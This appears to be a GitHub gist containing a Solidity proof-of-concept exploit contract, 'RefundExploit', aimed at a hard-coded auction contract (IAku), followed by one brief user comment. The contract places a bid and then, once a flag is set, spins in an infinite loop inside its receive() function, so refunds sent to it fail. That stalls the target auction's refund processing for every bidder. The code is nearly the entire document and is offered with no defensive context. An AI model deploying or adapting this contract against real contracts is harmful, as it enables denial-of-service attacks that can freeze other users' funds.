Skip to content

Instantly share code, notes, and snippets.

@except
Created April 22, 2022 22:05
  • Star 7 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save except/2ece3e40b72d0bf0cbd1107aa5d06926 to your computer and use it in GitHub Desktop.
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.13;
contract RefundExploit {
bool blocked;
function bid() external payable {
require(msg.sender == 0x0000000000000000000000000000000000000001);
IAku aku = IAku(0xF42c318dbfBaab0EEE040279C6a2588Fa01a961d);
aku.bid{value: msg.value}(1);
blocked = true;
}
receive() external payable {
if (blocked) {
while (true) {}
} else {
(bool success, ) = 0x0000000000000000000000000000000000000001.call{
value: msg.value
}("");
require(success);
}
}
function setBlocked(bool _blocked) external {
require(msg.sender == 0x0000000000000000000000000000000000000001);
blocked = _blocked;
}
}
interface IAku {
function bid(uint8) external payable;
}
@tea2x
Copy link

tea2x commented May 17, 2022

@jesusxy Thank you. I got it...I got misled by other analysis.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment